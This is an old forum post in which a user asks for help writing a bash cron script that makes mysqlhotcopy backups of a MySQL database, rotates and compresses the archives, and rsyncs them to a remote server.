Bash Script

Jun 1, 2007

I could use a bash script for a crontab that does a regular backup of my mysql database.

Unfortunately i can't employ one of the made-up backup scripts using mysqldump because i need to use mysqlhotcopy (that's because i need the raw data for a charset mess in mysql with some foreign languages not classifieds as utf8 .. long story), and i'm a total ignorant of perl and bash scripting.

The script (that will be recalled via cron) has to:remove all the .tar.gz files older than X days in the folder /xxx/backup, if the folder contains more than X tar.gz files
create a folder /xxx/backup/$todaydate call the command "mysqlhotcopy --bla -bla -bla " that will copy the dbase in the previously created /xxx/backup/$todaydate folder
at the end of the previous operation (if successful) compress the $todaydate folder in a $todaydate-sqlbackup.tar.gz file at the end of the previous operation (if successful) delete the uncompressed folder. launch the "rsync -bla -bla" command to syncronize this folder with a remote server I thought it will be something like a 10lines script, and i'll be glad to hand you a couple of virtual beers (via paypal ) as a thank you sign, but if the script is not trivial and you're willing to help anyhow, of course i'm willing to pay more.

View 1 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved